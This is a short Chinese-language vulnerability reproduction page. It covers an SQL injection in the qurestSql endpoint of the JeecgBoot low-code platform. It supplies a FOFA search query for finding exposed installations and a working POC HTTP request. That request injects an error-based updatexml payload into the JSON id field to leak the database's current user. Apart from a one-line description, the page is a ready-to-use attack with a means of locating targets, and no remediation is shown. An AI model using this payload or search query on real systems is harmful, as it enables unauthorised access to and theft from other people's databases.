漏洞描述
JeecgBoot 企业级低代码平台 qurestSql接口存在 SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库中的敏感数据,进一步攻击
漏洞影响
JeecgBoot 企业级低代码平台FOFA
app="JeecgBoot-企业级低代码平台"
漏洞复现
登陆页面
验证POC
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Content-Type: application/json
{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
收藏
发表评论